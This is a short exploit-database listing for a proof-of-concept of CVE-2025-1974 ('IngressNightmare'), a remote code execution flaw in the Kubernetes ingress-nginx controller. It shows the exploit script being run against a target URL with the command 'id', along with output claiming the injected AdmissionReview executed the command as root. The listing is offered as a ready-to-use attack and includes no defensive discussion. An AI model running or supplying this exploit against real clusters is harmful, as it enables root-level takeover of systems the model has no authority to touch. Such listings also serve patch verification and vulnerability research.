Share
## https://sploitus.com/exploit?id=F594BEF6-874B-5B05-9B6F-24CFBFC38867
# CVE-2025-1974-PoC-exploit
Kubernetes Ingress-nginx RCE (IngressNightmare)
```
โฏ python3 exploit.py http://localhost:8443 "id"
============================================================
CVE-2025-1974 - IngressNightmare Exploit
============================================================
[*] Target: http://localhost:8443/networking/v1/ingresses
[*] Command: id
[*] Sending malicious AdmissionReview...
[+] Command executed successfully!
========================================
OUTPUT:
========================================
uid=0(root) gid=0(root) groups=0(root)
```